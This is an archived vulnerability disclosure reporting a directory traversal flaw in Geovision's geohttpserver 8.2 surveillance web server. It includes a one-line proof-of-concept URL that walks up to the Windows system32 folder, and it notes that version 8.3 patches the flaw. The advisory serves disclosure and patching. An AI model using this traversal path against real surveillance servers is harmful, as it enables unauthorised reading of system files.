TUCoPS :: HP Unsorted D :: va2586.htm

Geovision Digital Video Surveillance System directory traversal (geohttpserver)
Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver)
Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver)


Hi.
There is a Directory traversal vulnerability in Geovision Digital Video Surveillance
System (geohttpserver)version 8.2.

POC:
http://remotehost/../../../../../../windows/system32/whatever.something 

PATCH:
Vendor has published the new version (8.3)


Regards,
Dejan Levaja 
NSS d.o.o.
dejan[dot]levaja[at]netsec[dot]rs

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH